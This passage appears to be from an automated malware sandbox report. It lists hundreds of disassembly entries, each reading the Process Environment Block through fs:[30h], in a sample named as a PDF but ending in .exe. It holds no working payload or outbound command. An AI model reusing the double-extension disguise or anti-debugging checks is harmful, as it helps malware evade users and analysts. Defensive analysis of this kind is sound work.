          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117674D mov esi, dword ptr fs:[00000030h]4_2_0117674D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117674D mov eax, dword ptr fs:[00000030h]4_2_0117674D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117674D mov eax, dword ptr fs:[00000030h]4_2_0117674D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148770 mov eax, dword ptr fs:[00000030h]4_2_01148770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]4_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E678E mov eax, dword ptr fs:[00000030h]4_2_011E678E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011407AF mov eax, dword ptr fs:[00000030h]4_2_011407AF
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F47A0 mov eax, dword ptr fs:[00000030h]4_2_011F47A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114C7C0 mov eax, dword ptr fs:[00000030h]4_2_0114C7C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C07C3 mov eax, dword ptr fs:[00000030h]4_2_011C07C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011447FB mov eax, dword ptr fs:[00000030h]4_2_011447FB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011447FB mov eax, dword ptr fs:[00000030h]4_2_011447FB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]4_2_011627ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]4_2_011627ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]4_2_011627ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CE7E1 mov eax, dword ptr fs:[00000030h]4_2_011CE7E1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182619 mov eax, dword ptr fs:[00000030h]4_2_01182619
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE609 mov eax, dword ptr fs:[00000030h]4_2_011BE609
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]4_2_0115260B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E627 mov eax, dword ptr fs:[00000030h]4_2_0115E627
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01176620 mov eax, dword ptr fs:[00000030h]4_2_01176620
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01178620 mov eax, dword ptr fs:[00000030h]4_2_01178620
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114262C mov eax, dword ptr fs:[00000030h]4_2_0114262C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120866E mov eax, dword ptr fs:[00000030h]4_2_0120866E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120866E mov eax, dword ptr fs:[00000030h]4_2_0120866E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115C640 mov eax, dword ptr fs:[00000030h]4_2_0115C640
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01172674 mov eax, dword ptr fs:[00000030h]4_2_01172674
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A660 mov eax, dword ptr fs:[00000030h]4_2_0117A660
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A660 mov eax, dword ptr fs:[00000030h]4_2_0117A660
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144690 mov eax, dword ptr fs:[00000030h]4_2_01144690
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144690 mov eax, dword ptr fs:[00000030h]4_2_01144690
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011766B0 mov eax, dword ptr fs:[00000030h]4_2_011766B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C6A6 mov eax, dword ptr fs:[00000030h]4_2_0117C6A6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0117A6C7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A6C7 mov eax, dword ptr fs:[00000030h]4_2_0117A6C7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]4_2_011BE6F2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]4_2_011BE6F2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]4_2_011BE6F2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]4_2_011BE6F2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C06F1 mov eax, dword ptr fs:[00000030h]4_2_011C06F1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C06F1 mov eax, dword ptr fs:[00000030h]4_2_011C06F1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01138918 mov eax, dword ptr fs:[00000030h]4_2_01138918
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01138918 mov eax, dword ptr fs:[00000030h]4_2_01138918
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CC912 mov eax, dword ptr fs:[00000030h]4_2_011CC912
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE908 mov eax, dword ptr fs:[00000030h]4_2_011BE908
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE908 mov eax, dword ptr fs:[00000030h]4_2_011BE908
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C892A mov eax, dword ptr fs:[00000030h]4_2_011C892A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D892B mov eax, dword ptr fs:[00000030h]4_2_011D892B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C0946 mov eax, dword ptr fs:[00000030h]4_2_011C0946
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CC97C mov eax, dword ptr fs:[00000030h]4_2_011CC97C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E4978 mov eax, dword ptr fs:[00000030h]4_2_011E4978
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E4978 mov eax, dword ptr fs:[00000030h]4_2_011E4978
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]4_2_01166962
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]4_2_01166962
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]4_2_01166962
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0118096E mov eax, dword ptr fs:[00000030h]4_2_0118096E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0118096E mov edx, dword ptr fs:[00000030h]4_2_0118096E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0118096E mov eax, dword ptr fs:[00000030h]4_2_0118096E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C89B3 mov esi, dword ptr fs:[00000030h]4_2_011C89B3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C89B3 mov eax, dword ptr fs:[00000030h]4_2_011C89B3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C89B3 mov eax, dword ptr fs:[00000030h]4_2_011C89B3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]4_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011409AD mov eax, dword ptr fs:[00000030h]4_2_011409AD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011409AD mov eax, dword ptr fs:[00000030h]4_2_011409AD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]4_2_0114A9D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011749D0 mov eax, dword ptr fs:[00000030h]4_2_011749D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D69C0 mov eax, dword ptr fs:[00000030h]4_2_011D69C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011729F9 mov eax, dword ptr fs:[00000030h]4_2_011729F9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011729F9 mov eax, dword ptr fs:[00000030h]4_2_011729F9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120A9D3 mov eax, dword ptr fs:[00000030h]4_2_0120A9D3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CE9E0 mov eax, dword ptr fs:[00000030h]4_2_011CE9E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CC810 mov eax, dword ptr fs:[00000030h]4_2_011CC810
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov ecx, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]4_2_01162835
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E483A mov eax, dword ptr fs:[00000030h]4_2_011E483A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E483A mov eax, dword ptr fs:[00000030h]4_2_011E483A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A830 mov eax, dword ptr fs:[00000030h]4_2_0117A830
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01170854 mov eax, dword ptr fs:[00000030h]4_2_01170854
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144859 mov eax, dword ptr fs:[00000030h]4_2_01144859
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144859 mov eax, dword ptr fs:[00000030h]4_2_01144859
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01152840 mov ecx, dword ptr fs:[00000030h]4_2_01152840
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6870 mov eax, dword ptr fs:[00000030h]4_2_011D6870
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6870 mov eax, dword ptr fs:[00000030h]4_2_011D6870
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CE872 mov eax, dword ptr fs:[00000030h]4_2_011CE872
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CE872 mov eax, dword ptr fs:[00000030h]4_2_011CE872
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CC89D mov eax, dword ptr fs:[00000030h]4_2_011CC89D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140887 mov eax, dword ptr fs:[00000030h]4_2_01140887
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120A8E4 mov eax, dword ptr fs:[00000030h]4_2_0120A8E4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E8C0 mov eax, dword ptr fs:[00000030h]4_2_0116E8C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012108C0 mov eax, dword ptr fs:[00000030h]4_2_012108C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C8F9 mov eax, dword ptr fs:[00000030h]4_2_0117C8F9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C8F9 mov eax, dword ptr fs:[00000030h]4_2_0117C8F9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]4_2_011BEB1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01208B28 mov eax, dword ptr fs:[00000030h]4_2_01208B28
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01208B28 mov eax, dword ptr fs:[00000030h]4_2_01208B28
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116EB20 mov eax, dword ptr fs:[00000030h]4_2_0116EB20
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116EB20 mov eax, dword ptr fs:[00000030h]4_2_0116EB20
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EEB50 mov eax, dword ptr fs:[00000030h]4_2_011EEB50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F4B4B mov eax, dword ptr fs:[00000030h]4_2_011F4B4B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F4B4B mov eax, dword ptr fs:[00000030h]4_2_011F4B4B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E8B42 mov eax, dword ptr fs:[00000030h]4_2_011E8B42
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6B40 mov eax, dword ptr fs:[00000030h]4_2_011D6B40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6B40 mov eax, dword ptr fs:[00000030h]4_2_011D6B40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120AB40 mov eax, dword ptr fs:[00000030h]4_2_0120AB40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113CB7E mov eax, dword ptr fs:[00000030h]4_2_0113CB7E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150BBE mov eax, dword ptr fs:[00000030h]4_2_01150BBE
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150BBE mov eax, dword ptr fs:[00000030h]4_2_01150BBE
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F4BB0 mov eax, dword ptr fs:[00000030h]4_2_011F4BB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F4BB0 mov eax, dword ptr fs:[00000030h]4_2_011F4BB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EEBD0 mov eax, dword ptr fs:[00000030h]4_2_011EEBD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]4_2_01140BCD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]4_2_01140BCD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]4_2_01140BCD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]4_2_01160BCB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]4_2_01160BCB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]4_2_01160BCB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]4_2_01148BF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]4_2_01148BF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]4_2_01148BF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116EBFC mov eax, dword ptr fs:[00000030h]4_2_0116EBFC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CCBF0 mov eax, dword ptr fs:[00000030h]4_2_011CCBF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CCA11 mov eax, dword ptr fs:[00000030h]4_2_011CCA11
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01164A35 mov eax, dword ptr fs:[00000030h]4_2_01164A35
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01164A35 mov eax, dword ptr fs:[00000030h]4_2_01164A35
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117CA38 mov eax, dword ptr fs:[00000030h]4_2_0117CA38
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117CA24 mov eax, dword ptr fs:[00000030h]4_2_0117CA24
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116EA2E mov eax, dword ptr fs:[00000030h]4_2_0116EA2E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]4_2_01146A50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150A5B mov eax, dword ptr fs:[00000030h]4_2_01150A5B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150A5B mov eax, dword ptr fs:[00000030h]4_2_01150A5B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BCA72 mov eax, dword ptr fs:[00000030h]4_2_011BCA72
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BCA72 mov eax, dword ptr fs:[00000030h]4_2_011BCA72
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]4_2_0117CA6F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]4_2_0117CA6F
